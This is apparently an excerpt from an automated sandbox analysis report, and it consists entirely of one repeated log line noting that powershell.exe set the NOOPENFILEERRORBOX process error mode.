                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
